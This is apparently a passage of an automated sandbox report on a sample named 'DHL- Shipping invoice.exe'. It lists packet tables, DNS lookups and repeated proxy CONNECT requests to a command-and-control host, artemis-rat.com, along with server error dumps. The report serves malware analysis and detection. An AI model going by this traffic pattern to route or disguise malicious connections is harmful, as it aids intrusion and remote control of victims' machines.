                            Mar 12, 2024 08:37:00.276494026 CET80005126324.144.95.218192.168.2.4
                            Mar 12, 2024 08:37:00.276705980 CET8051214104.19.138.4192.168.2.4
                            Mar 12, 2024 08:37:00.276886940 CET5121480192.168.2.4104.19.138.4
                            Mar 12, 2024 08:37:00.277102947 CET457385120495.111.237.46192.168.2.4
                            Mar 12, 2024 08:37:00.277796984 CET115355134567.43.228.254192.168.2.4
                            Mar 12, 2024 08:37:00.279704094 CET312850518138.68.60.8192.168.2.4
                            Mar 12, 2024 08:37:00.279786110 CET3128513483.21.101.158192.168.2.4
                            Mar 12, 2024 08:37:00.280002117 CET513483128192.168.2.43.21.101.158
                            Mar 12, 2024 08:37:00.280445099 CET615685121262.171.137.122192.168.2.4
                            Mar 12, 2024 08:37:00.280994892 CET506493128192.168.2.4103.176.179.84
                            Mar 12, 2024 08:37:00.280994892 CET503182999192.168.2.467.43.227.228
                            Mar 12, 2024 08:37:00.281001091 CET504671080192.168.2.4103.47.93.248
                            Mar 12, 2024 08:37:00.281019926 CET5070780192.168.2.450.200.12.86
                            Mar 12, 2024 08:37:00.281028032 CET504698080192.168.2.445.125.222.81
                            Mar 12, 2024 08:37:00.281028986 CET503321080192.168.2.437.193.40.16
                            Mar 12, 2024 08:37:00.281029940 CET501954145192.168.2.4107.181.168.145
                            Mar 12, 2024 08:37:00.281038046 CET502064145192.168.2.4142.54.231.38
                            Mar 12, 2024 08:37:00.281058073 CET504708089192.168.2.4117.70.48.59
                            Mar 12, 2024 08:37:00.281171083 CET504756005192.168.2.445.11.95.166
                            Mar 12, 2024 08:37:00.281502962 CET808051082102.132.54.62192.168.2.4
                            Mar 12, 2024 08:37:00.281780005 CET510828080192.168.2.4102.132.54.62
                            Mar 12, 2024 08:37:00.283499956 CET312850587155.185.15.56192.168.2.4
                            Mar 12, 2024 08:37:00.284035921 CET567850773202.144.134.150192.168.2.4
                            Mar 12, 2024 08:37:00.285058975 CET10805114815.207.35.241192.168.2.4
                            Mar 12, 2024 08:37:00.285166979 CET567850773202.144.134.150192.168.2.4
                            Mar 12, 2024 08:37:00.285202026 CET511481080192.168.2.415.207.35.241
                            Mar 12, 2024 08:37:00.286585093 CET312849953185.174.137.30192.168.2.4
                            Mar 12, 2024 08:37:00.287010908 CET805059550.168.72.116192.168.2.4
                            Mar 12, 2024 08:37:00.287045956 CET808151099154.72.90.74192.168.2.4
                            Mar 12, 2024 08:37:00.288408995 CET138735073767.43.228.253192.168.2.4
                            Mar 12, 2024 08:37:00.288922071 CET3067051077216.10.242.18192.168.2.4
                            Mar 12, 2024 08:37:00.290672064 CET805121650.169.135.10192.168.2.4
                            Mar 12, 2024 08:37:00.290874004 CET805135550.170.90.24192.168.2.4
                            Mar 12, 2024 08:37:00.290914059 CET5107730670192.168.2.4216.10.242.18
                            Mar 12, 2024 08:37:00.293603897 CET804974750.173.140.150192.168.2.4
                            Mar 12, 2024 08:37:00.294507980 CET8051047119.46.68.228192.168.2.4
                            Mar 12, 2024 08:37:00.294689894 CET5104780192.168.2.4119.46.68.228
                            Mar 12, 2024 08:37:00.295408010 CET108049946178.253.208.146192.168.2.4
                            Mar 12, 2024 08:37:00.295548916 CET808050423103.63.190.72192.168.2.4
                            Mar 12, 2024 08:37:00.296605110 CET5097933268192.168.2.4162.241.46.40
                            Mar 12, 2024 08:37:00.296633959 CET5019764768192.168.2.4173.212.250.16
                            Mar 12, 2024 08:37:00.296633959 CET5048110709192.168.2.4141.95.160.178
                            Mar 12, 2024 08:37:00.296638012 CET506474145192.168.2.4101.109.20.71
                            Mar 12, 2024 08:37:00.296638966 CET5008280192.168.2.450.207.199.82
                            Mar 12, 2024 08:37:00.296639919 CET5047410705192.168.2.48.134.50.79
                            Mar 12, 2024 08:37:00.296639919 CET504898080192.168.2.41.0.205.87
                            Mar 12, 2024 08:37:00.296663046 CET504839985192.168.2.431.200.242.201
                            Mar 12, 2024 08:37:00.296664953 CET5048711058192.168.2.451.89.173.40
                            Mar 12, 2024 08:37:00.296665907 CET5049339757192.168.2.4209.126.4.217
                            Mar 12, 2024 08:37:00.296668053 CET504728080192.168.2.437.120.192.154
                            Mar 12, 2024 08:37:00.296669006 CET504828080192.168.2.4103.82.157.102
                            Mar 12, 2024 08:37:00.296722889 CET5049116379192.168.2.451.15.223.12
                            Mar 12, 2024 08:37:00.296899080 CET41455111668.1.210.163192.168.2.4
                            Mar 12, 2024 08:37:00.296998978 CET41455111668.1.210.163192.168.2.4
                            Mar 12, 2024 08:37:00.297506094 CET414551277184.178.172.23192.168.2.4
                            Mar 12, 2024 08:37:00.297660112 CET512774145192.168.2.4184.178.172.23
                            Mar 12, 2024 08:37:00.300724983 CET805093718.133.16.21192.168.2.4
                            Mar 12, 2024 08:37:00.301923037 CET805111223.137.248.197192.168.2.4
                            Mar 12, 2024 08:37:00.302185059 CET5111280192.168.2.423.137.248.197
                            Mar 12, 2024 08:37:00.302556992 CET805111223.137.248.197192.168.2.4
                            Mar 12, 2024 08:37:00.303740025 CET4551750067176.31.110.126192.168.2.4
                            Mar 12, 2024 08:37:00.303863049 CET5117780192.168.2.445.12.31.3
                            Mar 12, 2024 08:37:00.304083109 CET414550496202.164.194.41192.168.2.4
                            Mar 12, 2024 08:37:00.304132938 CET8051235104.23.126.8192.168.2.4
                            Mar 12, 2024 08:37:00.304164886 CET8051235104.23.126.8192.168.2.4
                            Mar 12, 2024 08:37:00.304341078 CET8051248104.17.210.9192.168.2.4
                            Mar 12, 2024 08:37:00.304385900 CET8051248104.17.210.9192.168.2.4
                            Mar 12, 2024 08:37:00.304418087 CET8051235104.23.126.8192.168.2.4
                            Mar 12, 2024 08:37:00.304450989 CET80005082614.103.24.20192.168.2.4
                            Mar 12, 2024 08:37:00.304486990 CET5123580192.168.2.4104.23.126.8
                            Mar 12, 2024 08:37:00.304582119 CET508268000192.168.2.414.103.24.20
                            Mar 12, 2024 08:37:00.305213928 CET80005082614.103.24.20192.168.2.4
                            Mar 12, 2024 08:37:00.305300951 CET512993128192.168.2.434.135.203.172
                            Mar 12, 2024 08:37:00.305344105 CET8051233104.24.15.158192.168.2.4
                            Mar 12, 2024 08:37:00.305377007 CET8051233104.24.15.158192.168.2.4
                            Mar 12, 2024 08:37:00.305411100 CET8051231104.21.85.109192.168.2.4
                            Mar 12, 2024 08:37:00.305443048 CET8051231104.21.85.109192.168.2.4
                            Mar 12, 2024 08:37:00.305474997 CET8051248104.17.210.9192.168.2.4
                            Mar 12, 2024 08:37:00.305506945 CET8051231104.21.85.109192.168.2.4
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Mar 12, 2024 08:36:57.092562914 CET192.168.2.41.1.1.10xa74Standard query (0)github.comA (IP address)IN (0x0001)false
                            Mar 12, 2024 08:37:07.060477972 CET192.168.2.41.1.1.10x1112Standard query (0)artemis-rat.comA (IP address)IN (0x0001)false
                            Mar 12, 2024 08:37:07.785453081 CET192.168.2.41.1.1.10x8cb7Standard query (0)ktxcomay.com.vnA (IP address)IN (0x0001)false
                            Mar 12, 2024 08:37:13.071278095 CET192.168.2.41.1.1.10x8facStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                            Mar 12, 2024 08:37:15.264576912 CET192.168.2.41.1.1.10x7f6fStandard query (0)mail.orako.co.keA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Mar 12, 2024 08:36:57.180430889 CET1.1.1.1192.168.2.40xa74No error (0)github.com140.82.112.4A (IP address)IN (0x0001)false
                            Mar 12, 2024 08:37:07.149720907 CET1.1.1.1192.168.2.40x1112No error (0)artemis-rat.com104.21.54.158A (IP address)IN (0x0001)false
                            Mar 12, 2024 08:37:07.149720907 CET1.1.1.1192.168.2.40x1112No error (0)artemis-rat.com172.67.140.87A (IP address)IN (0x0001)false
                            Mar 12, 2024 08:37:08.775697947 CET1.1.1.1192.168.2.40x8cb7No error (0)ktxcomay.com.vn222.255.238.159A (IP address)IN (0x0001)false
                            Mar 12, 2024 08:37:13.159200907 CET1.1.1.1192.168.2.40x8facNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                            Mar 12, 2024 08:37:13.159200907 CET1.1.1.1192.168.2.40x8facNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                            Mar 12, 2024 08:37:13.159200907 CET1.1.1.1192.168.2.40x8facNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                            Mar 12, 2024 08:37:15.375247002 CET1.1.1.1192.168.2.40x7f6fNo error (0)mail.orako.co.keorako.co.keCNAME (Canonical name)IN (0x0001)false
                            Mar 12, 2024 08:37:15.375247002 CET1.1.1.1192.168.2.40x7f6fNo error (0)orako.co.ke34.195.165.88A (IP address)IN (0x0001)false
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449738211.234.125.34436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.248866081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.449753211.234.125.34436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.270607948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.449757211.234.125.34436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.276309967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.449749104.16.105.142806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.347640991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.434525967 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.44973938.162.21.24131286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.363054037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.682068110 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.44974213.38.176.10431286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.414535046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.577471972 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.44975535.185.196.3831286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.429714918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.593221903 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.449788172.67.182.102806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.432061911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.519305944 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.449762103.152.112.145806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.445151091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.890358925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.374767065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.343542099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.415537119 CET309INHTTP/1.1 400 Bad Request
                            Server: nginx/1.22.0
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.44979145.12.30.231806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.453814983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.541243076 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.44982043.153.55.2054436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.460366964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.449775132.148.167.243409616484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.462881088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.44982243.153.55.2054436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.463059902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.44982343.153.55.2054436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.464807987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            14192.168.2.44982443.153.55.2054436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.466367006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            15192.168.2.44976594.130.94.45806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.470455885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.644670963 CET303INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 154
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            16192.168.2.449832202.159.60.654436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.485028028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            17192.168.2.44977252.13.248.2931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.487107038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.181410074 CET65INHTTP/1.1 200 Connection Established
                            Content-Type: text/plain


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            18192.168.2.449833202.159.60.654436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.487360954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            19192.168.2.44979531.220.56.210806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.499814987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.612538099 CET805INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 613
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 